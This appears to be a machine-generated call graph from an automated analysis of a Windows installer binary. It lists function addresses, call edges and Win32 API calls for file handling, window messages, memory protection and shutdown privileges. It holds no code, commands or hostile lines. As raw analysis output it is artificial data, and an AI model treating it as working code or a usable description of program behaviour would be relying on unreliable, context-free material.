6fe91215 GlobalAlloc 4259->4343 4345 6fe915c2 GetProcAddress 4262->4345 4263 6fe91ef9 GlobalFree 4263->4267 4264 6fe92033 4264->4257 4272 6fe9208c lstrcpyA 4264->4272 4265 6fe9214b 4265->4258 4273 6fe92174 GetProcAddress 4265->4273 4267->4245 4267->4248 4267->4250 4267->4251 4267->4254 4267->4257 4267->4259 4267->4263 4267->4264 4268 6fe91224 2 API calls 4267->4268 4269 6fe91c64 4267->4269 4268->4267 4269->4267 4338 6fe91534 GlobalSize GlobalAlloc 4269->4338 4270 6fe921b0 4270->4257 4272->4257 4273->4258 4274 6fe91fbf 4274->4188 4276 6fe9230a 4275->4276 4278 6fe92446 GlobalFree 4276->4278 4279 6fe923b8 GlobalAlloc MultiByteToWideChar 4276->4279 4281 6fe91224 GlobalAlloc lstrcpynA 4276->4281 4284 6fe92405 4276->4284 4347 6fe912ad 4276->4347 4278->4276 4280 6fe91730 4278->4280 4282 6fe923e4 GlobalAlloc CLSIDFromString GlobalFree 4279->4282 4279->4284 4280->4198 4280->4199 4280->4211 4281->4276 4282->4278 4284->4278 4351 6fe92646 4284->4351 4287 6fe92a4a 4285->4287 4286 6fe92aef EnumWindows 4290 6fe92b0d 4286->4290 4287->4286 4289 6fe92bd9 4289->4211 4354 6fe929e4 4290->4354 4292 6fe922c4 4291->4292 4293 6fe922cf GlobalAlloc 4292->4293 4294 6fe91729 4292->4294 4293->4292 4294->4190 4299 6fe926e2 4295->4299 4296 6fe9277d GlobalAlloc 4300 6fe927a0 4296->4300 4297 6fe92790 4298 6fe92796 GlobalSize 4297->4298 4297->4300 4298->4300 4299->4296 4299->4297 4300->4216 4302 6fe92cce 4301->4302 4303 6fe92d0e GlobalFree 4302->4303 4358 6fe91215 GlobalAlloc 4304->4358 4306 6fe92598 WideCharToMultiByte 4312 6fe924e4 4306->4312 4307 6fe92563 lstrcpynA 4307->4312 4308 6fe92574 StringFromGUID2 WideCharToMultiByte 4308->4312 4309 6fe925b9 wsprintfA 4309->4312 4310 6fe925dd GlobalFree 4310->4312 4311 6fe92617 GlobalFree 4311->4209 4312->4306 4312->4307 4312->4308 4312->4309 4312->4310 4312->4311 4313 6fe91266 2 API calls 4312->4313 4359 6fe912d1 4312->4359 4313->4312 4363 6fe91215 GlobalAlloc 4315->4363 4317 6fe9155e 4318 6fe9156b 2 API calls 4317->4318 4319 6fe91568 4318->4319 4320 6fe91266 4319->4320 4321 6fe912a8 GlobalFree 4320->4321 4322 6fe9126f GlobalAlloc lstrcpynA 4320->4322 4321->4214 4322->4321 4324 6fe915a4 lstrcpyA 4323->4324 4325 6fe91577 wsprintfA 4323->4325 4328 6fe915bd 4324->4328 4325->4328 4328->4217 4330 6fe924ac 4329->4330 4332 6fe917ef 4329->4332 4331 6fe924c5 GlobalFree 4330->4331 4330->4332 4331->4330 4332->4224 4332->4225 4334 6fe91266 2 API calls 4333->4334 4335 6fe91503 4334->4335 4335->4219 4336->4243 4337->4267 4339 6fe91552 4338->4339 4339->4269 4346 6fe91215 GlobalAlloc 4340->4346 4342 6fe91233 lstrcpynA 4342->4257 4343->4274 4344->4265 4345->4270 4346->4342 4348 6fe912b4 4347->4348 4349 6fe91224 2 API calls 4348->4349 4350 6fe912cf 4349->4350 4350->4276 4352 6fe926aa 4351->4352 4353 6fe92654 VirtualAlloc 4351->4353 4352->4284 4353->4352 4355 6fe929ef 4354->4355 4356 6fe929ff 4355->4356 4357 6fe929f4 GetLastError 4355->4357 4356->4289 4357->4356 4358->4312 4360 6fe912f9 4359->4360 4361 6fe912da 4359->4361 4360->4312 4361->4360 4362 6fe912e0 lstrcpyA 4361->4362 4362->4360 4363->4317 5364 40166a 5365 402b2c 17 API calls 5364->5365 5366 401671 5365->5366 5367 402b2c 17 API calls 5366->5367 5368 40167a 5367->5368 5369 402b2c 17 API calls 5368->5369 5370 401683 MoveFileA 5369->5370 5371 401696 5370->5371 5372 40168f 5370->5372 5374 4062dd 2 API calls 5371->5374 5376 4022a9 5371->5376 5373 401423 24 API calls 5372->5373 5373->5376 5375 4016a5 5374->5375 5375->5376 5377 405db9 36 API calls 5375->5377 5377->5372 5378 4025ea 5379 402603 5378->5379 5380 4025ef 5378->5380 5381 402b2c 17 API calls 5379->5381 5382 402b0a 17 API calls 5380->5382 5383 40260a lstrlenA 5381->5383 5384 4025f8 5382->5384 5383->5384 5385 40262c 5384->5385 5386 405c1a WriteFile 5384->5386 5386->5385 5387 404a6d GetDlgItem GetDlgItem 5388 404ac3 7 API calls 5387->5388 5389 404cea 5387->5389 5390 404b6b DeleteObject 5388->5390 5391 404b5f SendMessageA 5388->5391 5394 404dcc 5389->5394 5421 404d59 5389->5421 5440 4049bb SendMessageA 5389->5440 5392 404b76 5390->5392 5391->5390 5393 404bad 5392->5393 5397 405ffc 17 API calls 5392->5397 5395 404068 18 API calls 5393->5395 5396 404e78 5394->5396 5399 404cdd 5394->5399 5405 404e25 SendMessageA 5394->5405 5398 404bc1 5395->5398 5400 404e82 SendMessageA 5396->5400 5401 404e8a 5396->5401 5402 404b8f SendMessageA SendMessageA 5397->5402 5404 404068 18 API calls 5398->5404 5406 4040cf 8 API calls 5399->5406 5400->5401 5408 404ea3 5401->5408 5409 404e9c ImageList_Destroy 5401->5409 5417 404eb3 5401->5417 5402->5392 5422 404bd2 5404->5422 5405->5399 5411 404e3a SendMessageA 5405->5411 5412 40506e 5406->5412 5407 404dbe SendMessageA 5407->5394 5413 404eac GlobalFree 5408->5413 5408->5417 5409->5408 5410 405022 5410->5399 5418 405034 ShowWindow GetDlgItem ShowWindow 5410->5418 5415 404e4d 5411->5415 5413->5417 5414 404cac GetWindowLongA SetWindowLongA 5416 404cc5 5414->5416 5426 404e5e SendMessageA 5415->5426 5419 404ce2 5416->5419 5420 404cca ShowWindow 5416->5420 5417->5410 5434 404eee 5417->5434 5445 404a3b 5417->5445 5418->5399 5439 40409d SendMessageA 5419->5439 5438 40409d SendMessageA 5420->5438 5421->5394 5421->5407 5422->5414 5425 404c24 SendMessageA 5422->5425 5427 404ca7 5422->5427 5428 404c62 SendMessageA 5422->5428 5429 404c76 SendMessageA 5422->5429 5425->5422 5426->5396 5427->5414 5427->5416 5428->5422 5429->5422 5431 404ff8 InvalidateRect 5431->5410 5432 40500e 5431->5432 5454 404976 5432->5454 5433 404f1c SendMessageA 5437 404f32 5433->5437 5434->5433 5434->5437 5436 404fa6 SendMessageA SendMessageA 5436->5437 5437->5431 5437->5436 5438->5399 5439->5389 5441 404a1a SendMessageA 5440->5441 5442 4049de GetMessagePos ScreenToClient SendMessageA 5440->5442 5443 404a12 5441->5443 5442->5443 5444 404a17 5442->5444 5443->5421 5444->5441 5457 405fda lstrcpynA 5445->5457 5447 404a4e 5458 405f38 wsprintfA 5447->5458 5449 404a58 5450 40140b 2 API calls 5449->5450 5451 404a61 5450->5451 5459 405fda lstrcpynA 5451->5459 5453 404a68 5453->5434 5460 4048b1 5454->5460 5456 40498b 5456->5410 5457->5447 5458->5449 5459->5453 5461 4048c7 5460->5461 5462 405ffc 17 API calls 5461->5462 5463 40492b 5462->5463 5464 405ffc 17 API calls 5463->5464 5465 404936 5464->5465 5466 405ffc 17 API calls 5465->5466 5467 40494c lstrlenA wsprintfA SetDlgItemTextA 5466->5467 5467->5456 5468 4019ed 5469 402b2c 17 API calls 5468->5469 5470 4019f4 5469->5470 5471 402b2c 17 API calls 5470->5471 5472 4019fd 5471->5472 5473 401a04 lstrcmpiA 5472->5473 5474 401a16 lstrcmpA 5472->5474 5475 401a0a 5473->5475 5474->5475 4403 4026ef 4404 4026f6 4403->4404 4406 402965 4403->4406 4405 402b0a 17 API calls 4404->4405 4407 4026fd 4405->4407 4408 40270c SetFilePointer 4407->4408 4408->4406 4409 40271c 4408->4409 4411 405f38 wsprintfA 4409->4411 4411->4406 5476 40156f 5477 401586 5476->5477 5478 40157f ShowWindow 5476->5478 5479 401594 ShowWindow 5477->5479 5480 4029b8 5477->5480 5478->5477 5479->5480 5488 6fe91058 5490 6fe91074 5488->5490 5489 6fe910dc 5490->5489 5492 6fe91091 5490->5492 5501 6fe914bb 5490->5501 5493 6fe914bb GlobalFree 5492->5493 5494 6fe910a1 5493->5494 5495 6fe910a8 GlobalSize 5494->5495 5496 6fe910b1 5494->5496 5495->5496 5497 6fe910b5 GlobalAlloc 5496->5497 5498 6fe910c6 5496->5498 5499 6fe914e2 3 API calls 5497->5499 5500 6fe910d1 GlobalFree 5498->5500 5499->5498 5500->5489 5503 6fe914c1 5501->5503 5502 6fe914c7 5502->5492 5503->5502 5504 6fe914d3 GlobalFree 5503->5504 5504->5492 5505 6fe9225a 5506 6fe922c4 5505->5506 5507 6fe922cf GlobalAlloc 5506->5507 5508 6fe922ee 5506->5508 5507->5506 5509 4014f4 SetForegroundWindow 5510 4029b8 5509->5510 5511 405075 5512 405085 5511->5512 5513 405099 5511->5513 5514 40508b 5512->5514 5523 4050e2 5512->5523 5515 4050b8 5513->5515 5516 4050a1 IsWindowVisible 5513->5516 5518 4040b4 SendMessageA 5514->5518 5517 4050e7 CallWindowProcA 5515->5517 5522 404a3b 4 API calls 5515->5522 5519 4050ae 5516->5519 5516->5523 5520 405095 5517->5520 5518->5520 5521 4049bb 5 API calls 5519->5521 5521->5515 5522->5523 5523->5517 5524 6fe915d1 5525 6fe914bb GlobalFree 5524->5525 5527 6fe915e9 5525->5527 5526 6fe9162f GlobalFree 5527->5526 5528 6fe91604 5527->5528 5529 6fe9161b VirtualFree 5527->5529 5528->5526 5529->5526 5530 4044fa 5531 404526 5530->5531 5532 404537 5530->5532 5591 4056da GetDlgItemTextA 5531->5591 5533 404543 GetDlgItem 5532->5533 5541 4045a2 5532->5541 5536 404557 5533->5536 5535 404531 5538 406244 5 API calls 5535->5538 5539 40456b SetWindowTextA 5536->5539 5544 405a0b 4 API calls 5536->5544 5537 404686 5540 404830 5537->5540 5593 4056da GetDlgItemTextA 5537->5593 5538->5532 5545 404068 18 API calls 5539->5545 5543 4040cf 8 API calls 5540->5543 5541->5537 5541->5540 5546 405ffc 17 API calls 5541->5546 5548 404844 5543->5548 5549 404561 5544->5549 5550 404587 5545->5550 5551 404616 SHBrowseForFolderA 5546->5551 5547 4046b6 5552 405a60 18 API calls 5547->5552 5549->5539 5556 405972 3 API calls 5549->5556 5553 404068 18 API calls 5550->5553 5551->5537 5554 40462e CoTaskMemFree 5551->5554 5555 4046bc 5552->5555 5557 404595 5553->5557 5558 405972 3 API calls 5554->5558 5594 405fda lstrcpynA 5555->5594 5556->5539 5592 40409d SendMessageA 5557->5592 5560 40463b 5558->5560 5563 404672 SetDlgItemTextA 5560->5563 5567 405ffc 17 API calls 5560->5567 5562 40459b 5565 406372 5 API calls 5562->5565 5563->5537 5564 4046d3 5566 406372 5 API calls 5564->5566 5565->5541 5574 4046da 5566->5574 5568 40465a lstrcmpiA 5567->5568 5568->5563 5570 40466b lstrcatA 5568->5570 5569 404716 5595 405fda lstrcpynA 5569->5595 5570->5563 5572 40471d 5573 405a0b 4 API calls 5572->5573 5575 404723 GetDiskFreeSpaceA 5573->5575 5574->5569 5578 4059b9 2 API calls 5574->5578 5580 40476e 5574->5580 5577 404747 MulDiv 5575->5577 5575->5580 5577->5580 5578->5574 5579 4047df 5582 404802 5579->5582 5584 40140b 2 API calls 5579->5584 5580->5579 5581 404976 20 API calls 5580->5581 5583 4047cc 5581->5583 5596 40408a KiUserCallbackDispatcher 5582->5596 5585 4047e1 SetDlgItemTextA 5583->5585 5586 4047d1 5583->5586 5584->5582 5585->5579 5588 4048b1 20 API calls 5586->5588 5588->5579 5589 40481e 5589->5540 5590 404453 SendMessageA 5589->5590 5590->5540 5591->5535 5592->5562 5593->5547 5594->5564 5595->5572 5596->5589 5597 401cfb 5598 402b0a 17 API calls 5597->5598 5599 401d02 5598->5599 5600 402b0a 17 API calls 5599->5600 5601 401d0e GetDlgItem 5600->5601 5602 4025e4 5601->5602 5603 4018fd 5604 401934 5603->5604 5605 402b2c 17 API calls 5604->5605 5606 401939 5605->5606 5607 4057a2 67 API calls 5606->5607 5608 401942 5607->5608 5609 401dff GetDC 5610 402b0a 17 API calls 5609->5610 5611 401e11 GetDeviceCaps MulDiv ReleaseDC 5610->5611 5612 402b0a 17 API calls 5611->5612 5613 401e42 5612->5613 5614 405ffc 17 API calls 5613->5614 5615 401e7f CreateFontIndirectA 5614->5615 5616 4025e4 5615->5616 5617 401000 5618 401037 BeginPaint GetClientRect 5617->5618 5619 40100c DefWindowProcA 5617->5619 5621 4010f3 5618->5621 5622 401179 5619->5622 5623 401073 CreateBrushIndirect FillRect DeleteObject 5621->5623 5624 4010fc 5621->5624 5623->5621 5625 401102 CreateFontIndirectA 5624->5625 5626 401167 EndPaint 5624->5626 5625->5626 5627 401112 6 API calls 5625->5627 5626->5622 5627->5626 5628 401900 5629 402b2c 17 API calls 5628->5629 5630 401907 5629->5630 5631 4056f6 MessageBoxIndirectA 5630->5631 5632 401910 5631->5632 5633 401502 5634 40150a 5633->5634 5636 40151d 5633->5636 5635 402b0a 17 API calls 5634->5635 5635->5636 4161 6fe92921 4162 6fe92971 4161->4162 4163 6fe92931 VirtualProtect 4161->4163 4163->4162 4364 401c0a 4386 402b0a 4364->4386 4366 401c11 4367 402b0a 17 API calls 4366->4367 4368 401c1e 4367->4368 4369 401c33 4368->4369 4370 402b2c 17 API calls 4368->4370 4371 401c43 4369->4371 4372 402b2c 17 API calls 4369->4372 4370->4369 4373 401c9a 4371->4373 4374 401c4e 4371->4374 4372->4371 4375 402b2c 17 API calls 4373->4375 4376 402b0a 17 API calls 4374->4376 4377 401c9f 4375->4377 4378 401c53 4376->4378 4380 402b2c 17 API calls 4377->4380 4379 402b0a 17 API calls 4378->4379 4381 401c5f 4379->4381 4382 401ca8 FindWindowExA 4380->4382 4383 401c8a SendMessageA 4381->4383 4384 401c6c SendMessageTimeoutA 4381->4384 4385 401cc6 4382->4385 4383->4385 4384->4385 4387 405ffc 17 API calls 4386->4387 4388 402b1f 4387->4388 4388->4366 4412 401e8f 4413 402b0a 17 API calls 4412->4413 4414 401e95 4413->4414 4415 402b0a 17 API calls 4414->4415 4416 401ea1 4415->4416 4417 401eb8 EnableWindow 4416->4417 4418 401ead ShowWindow 4416->4418 4419 4029b8 4417->4419 4418->4419 5644 401490 5645 405101 24 API calls 5644->5645 5646 401497 5645->5646 5647 6fe91638 5648 6fe91667 5647->5648 5649 6fe91a98 18 API calls 5648->5649 5650 6fe9166e 5649->5650 5651 6fe91681 5650->5651 5652 6fe91675 5650->5652 5654 6fe916a8 5651->5654 5655 6fe9168b 5651->5655 5653 6fe91266 2 API calls 5652->5653 5658 6fe9167f 5653->5658 5656 6fe916ae 5654->5656 5657 6fe916d2 5654->5657 5659 6fe914e2 3 API calls 5655->5659 5660 6fe91559 3 API calls 5656->5660 5661 6fe914e2 3 API calls 5657->5661 5662 6fe91690 5659->5662 5663 6fe916b3 5660->5663 5661->5658 5664 6fe91559 3 API calls 5662->5664 5665 6fe91266 2 API calls 5663->5665 5666 6fe91696 5664->5666 5667 6fe916b9 GlobalFree 5665->5667 5668 6fe91266 2 API calls 5666->5668 5667->5658 5669 6fe916cd GlobalFree 5667->5669 5670 6fe9169c GlobalFree 5668->5670 5669->5658 5670->5658 5671 402993 SendMessageA 5672 4029b8 5671->5672 5673 4029ad InvalidateRect 5671->5673 5673->5672 4636 403b94 4637 403ce7 4636->4637 4638 403bac 4636->4638 4640 403cf8 GetDlgItem GetDlgItem 4637->4640 4649 403d38 4637->4649 4638->4637 4639 403bb8 4638->4639 4641 403bc3 SetWindowPos 4639->4641 4642 403bd6 4639->4642 4643 404068 18 API calls 4640->4643 4641->4642 4646 403bf3 4642->4646 4647 403bdb ShowWindow 4642->4647 4648 403d22 SetClassLongA 4643->4648 4644 403d92 4655 403ce2 4644->4655 4707 4040b4 4644->4707 4650 403c15 4646->4650 4651 403bfb DestroyWindow 4646->4651 4647->4646 4652 40140b 2 API calls 4648->4652 4649->4644 4653 401389 2 API calls 4649->4653 4657 403c1a SetWindowLongA 4650->4657 4658 403c2b 4650->4658 4656 403ff1 4651->4656 4652->4649 4654 403d6a 4653->4654 4654->4644 4659 403d6e SendMessageA 4654->4659 4656->4655 4665 404022 ShowWindow 4656->4665 4657->4655 4662 403cd4 4658->4662 4663 403c37 GetDlgItem 4658->4663 4659->4655 4660 40140b 2 API calls 4680 403da4 4660->4680 4661 403ff3 DestroyWindow EndDialog 4661->4656 4664 4040cf 8 API calls 4662->4664 4666 403c67 4663->4666 4667 403c4a SendMessageA IsWindowEnabled 4663->4667 4664->4655 4665->4655 4669 403c74 4666->4669 4670 403cbb SendMessageA 4666->4670 4671 403c87 4666->4671 4681 403c6c 4666->4681 4667->4655 4667->4666 4668 405ffc 17 API calls 4668->4680 4669->4670 4669->4681 4670->4662 4674 403ca4 4671->4674 4675 403c8f 4671->4675 4673 404068 18 API calls 4673->4680 4678 40140b 2 API calls 4674->4678 4720 40140b 4675->4720 4676 403ca2 4676->4662 4679 403cab 4678->4679 4679->4662 4679->4681 4680->4655 4680->4660 4680->4661 4680->4668 4680->4673 4682 404068 18 API calls 4680->4682 4698 403f33 DestroyWindow 4680->4698 4723 404041 4681->4723 4683 403e1f GetDlgItem 4682->4683 4684 403e34 4683->4684 4685 403e3c ShowWindow KiUserCallbackDispatcher 4683->4685 4684->4685 4710 40408a KiUserCallbackDispatcher 4685->4710 4687 403e66 EnableWindow 4692 403e7a 4687->4692 4688 403e7f GetSystemMenu EnableMenuItem SendMessageA 4689 403eaf SendMessageA 4688->4689 4688->4692 4689->4692 4692->4688 4711 40409d SendMessageA 4692->4711 4712 403b75 4692->4712 4715 405fda lstrcpynA 4692->4715 4694 403ede lstrlenA 4695 405ffc 17 API calls 4694->4695 4696 403eef SetWindowTextA 4695->4696 4716 401389 4696->4716 4698->4656 4699 403f4d CreateDialogParamA 4698->4699 4699->4656 4700 403f80 4699->4700 4701 404068 18 API calls 4700->4701 4702 403f8b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4701->4702 4703 401389 2 API calls 4702->4703 4704 403fd1 4703->4704 4704->4655 4705 403fd9 ShowWindow 4704->4705 4706 4040b4 SendMessageA 4705->4706 4706->4656 4708 4040cc 4707->4708 4709 4040bd SendMessageA 4707->4709 4708->4680 4709->4708 4710->4687 4711->4692 4713 405ffc 17 API calls 4712->4713 4714 403b83 SetWindowTextA 4713->4714 4714->4692 4715->4694 4718 401390 4716->4718 4717 4013fe 4717->4680 4718->4717 4719 4013cb MulDiv SendMessageA 4718->4719 4719->4718 4721 401389 2 API calls 4720->4721 4722 401420 4721->4722 4722->4681 4724 404048 4723->4724 4725 40404e SendMessageA 4723->4725 4724->4725 4725->4676 5674 6fe9103d 5677 6fe9101b 5674->5677 5678 6fe914bb GlobalFree 5677->5678 5679 6fe91020 5678->5679 5680 6fe91024 5679->5680 5681 6fe91027 GlobalAlloc 5679->5681 5682 6fe914e2 3 API calls 5680->5682 5681->5680 5683 6fe9103b 5682->5683 5684 401f98 5685 402b2c 17 API calls 5684->5685 5686 401f9f 5685->5686 5687 4062dd 2 API calls 5686->5687 5688 401fa5 5687->5688 5690 401fb7 5688->5690 5691 405f38 wsprintfA 5688->5691 5691->5690 5115 40159d 5116 402b2c 17 API calls 5115->5116 5117 4015a4 SetFileAttributesA 5116->5117 5118 4015b6 5117->5118 5706 40149d 5707 4014ab PostQuitMessage 5706->5707 5708 40234e 5706->5708 5707->5708 5119 401a1e 5120 402b2c 17 API calls 5119->5120 5121 401a27 ExpandEnvironmentStringsA 5120->5121 5122 401a3b 5121->5122 5124 401a4e 5121->5124 5123 401a40 lstrcmpA 5122->5123 5122->5124 5123->5124 5714 40289e 5715 402b0a 17 API calls 5714->5715 5716 4028a4 5715->5716 5717 4028e3 5716->5717 5718 4028cc 5716->5718 5726 402783 5716->5726 5719 4028fd 5717->5719 5720 4028ed 5717->5720 5723 4028d1 5718->5723 5724 4028e0 5718->5724 5722 405ffc 17 API calls 5719->5722 5721 402b0a 17 API calls 5720->5721 5721->5724 5722->5724 5728 405fda lstrcpynA 5723->5728 5724->5726 5729 405f38 wsprintfA 5724->5729 5728->5726 5729->5726 5730 40419e lstrcpynA lstrlenA 5731 6fe91837 5732 6fe9185a 5731->5732 5733 6fe9188a GlobalFree 5732->5733 5734 6fe9189c 5732->5734 5733->5734 5735 6fe91266 2 API calls 5734->5735 5736 6fe91a1e GlobalFree GlobalFree 5735->5736 5737 40171f 5738 402b2c 17 API calls 5737->5738 5739 401726 SearchPathA 5738->5739 5740 401741 5739->5740 5741 401d20 5742 402b0a 17 API calls 5741->5742 5743 401d2e SetWindowLongA 5742->5743 5744 4029b8 5743->5744 5745 402721 5746 402727 5745->5746 5747 4029b8 5746->5747 5748 40272f FindClose 5746->5748 5748->5747 5749 406a23 5753 4064ea 5749->5753 5750 406e55 5751 406574 GlobalAlloc 5751->5750 5751->5753 5752 40656b GlobalFree 5752->5751 5753->5750 5753->5751 5753->5752 5753->5753 5754 4065e2 GlobalFree 5753->5754 5755 4065eb GlobalAlloc 5753->5755 5754->5755 5755->5750 5755->5753 4113 4023a7 4114 402b2c 17 API calls 4113->4114 4115 4023b8 4114->4115 4116 402b2c 17 API calls 4115->4116 4117 4023c1 4116->4117 4118 402b2c 17 API calls 4117->4118 4119 4023cb GetPrivateProfileStringA 4118->4119 5756 6fe91000 5757 6fe9101b 5 API calls 5756->5757 5758 6fe91019 5757->5758 5759 40292c 5760 402b0a 17 API calls 5759->5760 5761 402932 5760->5761 5762 402967 5761->5762 5763 402783 5761->5763 5765 402944 5761->5765 5762->5763 5764 405ffc 17 API calls 5762->5764 5764->5763 5765->5763 5767 405f38 wsprintfA 5765->5767 5767->5763 4420 402631 4421 402b0a 17 API calls 4420->4421 4425 40263b 4421->4425 4422 4026a9 4424 4026ab 4431 405f38 wsprintfA 4424->4431 4425->4422 4425->4424 4426 4026bb 4425->4426 4429 405beb ReadFile 4425->4429 4426->4422 4428 4026d1 SetFilePointer 4426->4428 4428->4422 4430 405c09 4429->4430 4430->4425 4431->4422 4432 401932 4433 401934 4432->4433 4434 402b2c 17 API calls 4433->4434 4435 401939 4434->4435 4438 4057a2 4435->4438 4478 405a60 4438->4478 4441 4057e1 4443 405919 4441->4443 4492 405fda lstrcpynA 4441->4492 4442 4057ca DeleteFileA 4448 401942 4442->4448 4443->4448 4510 4062dd FindFirstFileA 4443->4510 4445 405807 4446 40581a 4445->4446 4447 40580d lstrcatA 4445->4447 4493 4059b9 lstrlenA 4446->4493 4449 405820 4447->4449 4452 40582e lstrcatA 4449->4452 4454 405839 lstrlenA FindFirstFileA 4449->4454 4452->4454 4456 40590f 4454->4456 4476 40585d 4454->4476 4455 405937 4513 405972 lstrlenA CharPrevA 4455->4513 4456->4443 4458 40599d CharNextA 4458->4476 4460 40575a 5 API calls 4461 405949 4460->4461 4462 405963 4461->4462 4463 40594d 4461->4463 4465 405101 24 API calls 4462->4465 4463->4448 4467 405101 24 API calls 4463->4467 4465->4448 4466 4058ee FindNextFileA 4468 405906 FindClose 4466->4468 4466->4476 4469 40595a 4467->4469 4468->4456 4470 405db9 36 API calls 4469->4470 4473 405961 4470->4473 4472 4057a2 60 API calls 4472->4476 4473->4448 4474 405101 24 API calls 4474->4466 4475 405101 24 API calls 4475->4476 4476->4458 4476->4466 4476->4472 4476->4474 4476->4475 4497 405fda lstrcpynA 4476->4497 4498 40575a 4476->4498 4506 405db9 MoveFileExA 4476->4506 4516 405fda lstrcpynA 4478->4516 4480 405a71 4517 405a0b CharNextA CharNextA 4480->4517 4483 4057c2 4483->4441 4483->4442 4484 406244 5 API calls 4490 405a87 4484->4490 4485 405ab2 lstrlenA 4486 405abd 4485->4486 4485->4490 4487 405972 3 API calls 4486->4487 4489 405ac2 GetFileAttributesA 4487->4489 4488 4062dd 2 API calls 4488->4490 4489->4483 4490->4483 4490->4485 4490->4488 4491 4059b9 2 API calls 4490->4491 4491->4485 4492->4445 4494 4059c6 4493->4494 4495 4059d7 4494->4495 4496 4059cb CharPrevA 4494->4496 4495->4449 4496->4494 4496->4495 4497->4476 4523 405b4e GetFileAttributesA 4498->4523 4501 405787 4501->4476 4502 405775 RemoveDirectoryA 4504 405783 4502->4504 4503 40577d DeleteFileA 4503->4504 4504->4501 4505 405793 SetFileAttributesA 4504->4505 4505->4501 4507 405dda 4506->4507 4508 405dcd 4506->4508 4507->4476 4526 405c49 4508->4526 4511 4062f3 FindClose 4510->4511 4512 405933 4510->4512 4511->4512 4512->4448 4512->4455 4514 40593d 4513->4514 4515 40598c lstrcatA 4513->4515 4514->4460 4515->4514 4516->4480 4518 405a26 4517->4518 4520 405a36 4517->4520 4518->4520 4521 405a31 CharNextA 4518->4521 4519 405a56 4519->4483 4519->4484 4520->4519 4522 40599d CharNextA 4520->4522 4521->4519 4522->4520 4524 405b60 SetFileAttributesA 4523->4524 4525 405766 4523->4525 4524->4525 4525->4501 4525->4502 4525->4503 4527 405c95 GetShortPathNameA 4526->4527 4528 405c6f 4526->4528 4530 405db4 4527->4530 4531 405caa 4527->4531 4553 405b73 GetFileAttributesA CreateFileA 4528->4553 4530->4507 4531->4530 4533 405cb2 wsprintfA 4531->4533 4532 405c79 CloseHandle GetShortPathNameA 4532->4530 4534 405c8d 4532->4534 4535 405ffc 17 API calls 4533->4535 4534->4527 4534->4530 4536 405cda 4535->4536 4554 405b73 GetFileAttributesA CreateFileA 4536->4554 4538 405ce7 4538->4530 4539 405cf6 GetFileSize GlobalAlloc 4538->4539 4540 405d18 4539->4540 4541 405dad CloseHandle 4539->4541 4542 405beb ReadFile 4540->4542 4541->4530 4543 405d20 4542->4543 4543->4541 4555 405ad8 lstrlenA 4543->4555 4546 405d37 lstrcpyA 4549 405d59 4546->4549 4547 405d4b 4548 405ad8 4 API calls 4547->4548 4548->4549 4550 405d90 SetFilePointer 4549->4550 4560 405c1a WriteFile 4550->4560 4553->4532 4554->4538 4556 405b19 lstrlenA 4555->4556 4557 405b21 4556->4557 4558 405af2 lstrcmpiA 4556->4558 4557->4546 4557->4547 4558->4557 4559 405b10 CharNextA 4558->4559 4559->4556 4561 405c38 GlobalFree 4560->4561 4561->4541 4562 4022b2 4563 402b2c 17 API calls 4562->4563 4564 4022b8 4563->4564 4565 402b2c 17 API calls 4564->4565 4566 4022c1 4565->4566 4567 402b2c 17 API calls 4566->4567 4568 4022ca 4567->4568 4569 4062dd 2 API calls 4568->4569 4570 4022d3 4569->4570 4571 4022e4 lstrlenA lstrlenA 4570->4571 4572 4022d7 4570->4572 4574 405101 24 API calls 4571->4574 4573 405101 24 API calls 4572->4573 4576 4022df 4572->4576 4573->4576 4575 402320 SHFileOperationA 4574->4575 4575->4572 4575->4576 5775 4044b3 5776 4044c3 5775->5776 5777 4044e9 5775->5777 5778 404068 18 API calls 5776->5778 5779 4040cf 8 API calls 5777->5779 5780 4044d0 SetDlgItemTextA 5778->5780 5781 4044f5 5779->5781 5780->5777 5782 402334 5783 40233b 5782->5783 5786 40234e 5782->5786 5784 405ffc 17 API calls 5783->5784 5785 402348 5784->5785 5785->5786 5787 4056f6 MessageBoxIndirectA 5785->5787 5787->5786 4726 403235 SetErrorMode GetVersion 4727 403276 4726->4727 4728 40327c 4726->4728 4729 406372 5 API calls 4727->4729 4730 406304 3 API calls 4728->4730 4729->4728 4731 403292 lstrlenA 4730->4731 4731->4728 4732 4032a1 4731->4732 4733 406372 5 API calls 4732->4733 4734 4032a8 4733->4734 4735 406372 5 API calls 4734->4735 4736 4032af 4735->4736 4737 406372 5 API calls 4736->4737 4738 4032bb #17 OleInitialize SHGetFileInfoA 4737->4738 4816 405fda lstrcpynA 4738->4816 4741 403307 GetCommandLineA 4817 405fda lstrcpynA 4741->4817 4743 403319 4744 40599d CharNextA 4743->4744 4745 403342 CharNextA 4744->4745 4750 403352 4745->4750 4746 40341c 4747 40342f GetTempPathA 4746->4747 4818 403204 4747->4818 4749 403447 4751 4034a1 DeleteFileA 4749->4751 4752 40344b GetWindowsDirectoryA lstrcatA 4749->4752 4750->4746 4753 40599d CharNextA 4750->4753 4758 40341e 4750->4758 4828 402dc4 GetTickCount GetModuleFileNameA 4751->4828 4755 403204 12 API calls 4752->4755 4753->4750 4757 403467 4755->4757 4756 4034b5 4759 40354b 4756->4759 4762 40353b 4756->4762 4766 40599d CharNextA 4756->4766 4757->4751 4761 40346b GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4757->4761 4912 405fda lstrcpynA 4758->4912 4915 40371d 4759->4915 4764 403204 12 API calls 4761->4764 4856 4037f7 4762->4856 4768 403499 4764->4768 4769 4034d0 4766->4769 4768->4751 4768->4759 4776 403516 4769->4776 4777 40357b 4769->4777 4770 403683 4773 403705 ExitProcess 4770->4773 4774 40368b GetCurrentProcess OpenProcessToken 4770->4774 4771 403565 4922 4056f6 4771->4922 4779 4036d6 4774->4779 4780 4036a6 LookupPrivilegeValueA AdjustTokenPrivileges 4774->4780 4782 405a60 18 API calls 4776->4782 4926 405661 4777->4926 4781 406372 5 API calls 4779->4781 4780->4779 4784 4036dd 4781->4784 4785 403521 4782->4785 4787 4036f2 ExitWindowsEx 4784->4787 4791 4036fe 4784->4791 4785->4759 4913 405fda lstrcpynA 4785->4913 4787->4773 4787->4791 4788 403591 lstrcatA 4789 40359c lstrcatA lstrcmpiA 4788->4789 4789->4759 4790 4035b8 4789->4790 4793 4035c4 4790->4793 4794 4035bd 4790->4794 4795 40140b 2 API calls 4791->4795 4934 405644 CreateDirectoryA 4793->4934 4929 4055c7 CreateDirectoryA 4794->4929 4795->4773 4796 403530 4914 405fda lstrcpynA 4796->4914 4801 4035c9 